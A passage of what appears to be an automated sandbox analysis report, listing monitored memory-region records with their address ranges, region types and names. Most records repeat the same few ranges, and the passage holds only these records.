0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3327 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3328 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3329 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3330 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3331 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3332 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3333 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3334 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3335 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3336 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3337 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3338 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3339 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3340 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3341 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3342 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3343 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3344 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3345 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3346 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3347 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3348 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3349 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3350 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3351 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3352 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3353 start_va = 0x9a20000 end_va = 0x9f11fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009a20000" filename = "" Region: id = 3354 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3355 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3356 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3357 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3358 start_va = 0x470000 end_va = 0x472fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 3359 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3360 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3361 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3362 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3363 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3364 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3365 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3367 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3368 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3369 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3370 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3371 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3372 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3373 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3374 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3375 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3376 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3377 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3378 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3379 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3380 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3381 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3382 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3383 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3384 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3385 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3386 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3387 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3388 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3389 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3390 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3391 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3392 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3393 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3394 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3395 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3396 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3397 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3398 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3399 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3400 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3401 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3402 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3403 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3404 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3405 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3406 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3407 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3408 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3409 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3410 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3411 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3412 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3413 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3414 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3415 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3416 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3417 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3418 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3419 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3420 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3421 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3422 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3423 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3424 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3425 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3426 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3427 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3428 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3429 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3430 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3431 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3432 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3433 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3434 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3435 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3436 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3437 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3438 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3439 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3440 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3441 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3442 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3443 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3444 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3445 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3446 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3447 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3448 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3449 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3450 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3451 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3452 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3453 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3454 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3455 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3456 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3457 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3458 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3459 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3460 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3461 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3462 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3463 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3464 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3465 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3466 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3467 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3468 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3469 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3470 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3471 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3472 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3473 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3474 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3475 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3476 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3477 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3478 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3479 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3480 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3481 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3482 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3483 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3484 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3485 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3486 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3487 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3488 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3489 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3490 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3491 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3492 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3493 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3494 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3495 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3496 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3497 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3498 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3499 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3500 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3501 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3502 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3503 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3504 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3505 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3506 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3507 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3508 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3509 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3510 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3511 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3512 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3513 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3514 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3515 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3516 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3517 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3518 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3519 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3520 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3521 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3522 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3523 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3524 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3525 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3526 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3528 